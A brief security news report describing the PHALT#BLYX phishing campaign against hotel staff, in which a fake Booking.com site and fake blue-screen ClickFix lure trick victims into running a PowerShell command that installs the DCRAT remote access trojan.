07/69 Wednesday, January 7, 2026
Security researchers from Securonix have identified a new cyberattack campaign dubbed PHALT#BLYX, targeting businesses in the travel and hospitality sector. Attackers send phishing emails impersonating customers from Booking[.]com, claiming to cancel hotel reservations and requesting unusually large refunds to create a sense of urgency. When employees click the link in the email, they are redirected to a convincing fake Booking[.]com website, making it difficult to distinguish from the legitimate site at a glance.
What makes this campaign particularly notable is the use of the ClickFix social-engineering technique combined with a fake Blue Screen of Death (BSOD). The fraudulent website displays a message stating that the page is “taking too long to load.” When the victim refreshes the page, the browser shows a blue screen mimicking a system crash, along with deceptive instructions telling the user to press Windows + R, then Ctrl + V, and Enter to fix the issue. In reality, these steps trick the victim into pasting and executing a malicious PowerShell command that the attackers have preloaded into the clipboard.
If the victim follows these instructions, the command immediately downloads and installs a Remote Access Trojan (RAT) known as DCRAT. This malware enables attackers to remotely control the compromised system, log keystrokes, steal sensitive information, secretly install cryptocurrency miners, and use the infected machine as a foothold to attack the organization’s internal network. The entire infection chain is designed to evade detection by Windows Defender, making the attack particularly stealthy and dangerous.
